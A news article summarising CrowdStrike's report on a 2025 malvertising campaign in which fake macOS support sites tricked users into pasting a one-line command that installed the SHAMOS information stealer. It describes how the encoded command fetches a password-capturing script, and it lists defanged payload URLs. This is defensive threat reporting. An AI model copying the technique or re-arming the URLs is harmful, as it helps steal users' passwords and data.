Malicious macOS support sites spread malware designed to steal sensitive information in a targeted series of attacks
In a recent blog post, cybersecurity firm CrowdStrike has revealed the discovery of a sophisticated malvertising campaign targeting hundreds of organisations between June and August 2025. This campaign, with roots traced back to a threat actor group linked to the Lazarus Group, aimed to infect victims with a variant of the Atomic macOS Stealer (AMOS), developed by malware-as-a-service group Cookie Spider.
The malware, known as SHAMOS, was distributed through malicious GitHub repositories and malicious macOS help websites. These websites provided false instructions to unsuspecting users, encouraging them to copy, paste, and execute a malicious one-line installation command. This technique allowed cybercriminals to bypass Gatekeeper security checks and install the SHAMOS Mach-O executable directly onto victim devices.
CrowdStrike stated that this campaign underscores the popularity of malicious one-line installation commands among eCrime actors. The command, when executed, decodes to a Base64-encoded string which downloads a file from https[:]//icloudservers[.]com/gm/install[.]sh. This downloaded file is a Bash script that captures the user's password and downloads another SHAMOS Mach-O executable from https[:]//icloudservers[.]com/gm/update.
It's important to note that this isn't the first time eCrime actors have used this method. Previously, Cuckoo Stealer and SHAMOS operators have leveraged this approach in Homebrew malvertising campaigns between May 2024 and January 2025.
CrowdStrike blocked the malvertising campaign from attempting to compromise over 300 of its customer environments during this period. The malvertising site appeared in Google search results in locations including the UK, Japan, China, Colombia, Canada, Mexico, Italy, and others.
CrowdStrike assesses with high confidence that eCrime actors are likely to continue leveraging both malvertising and one-line installation commands to distribute macOS information stealers. Users are advised to exercise caution when clicking on links from unfamiliar sources and to regularly update their security software.
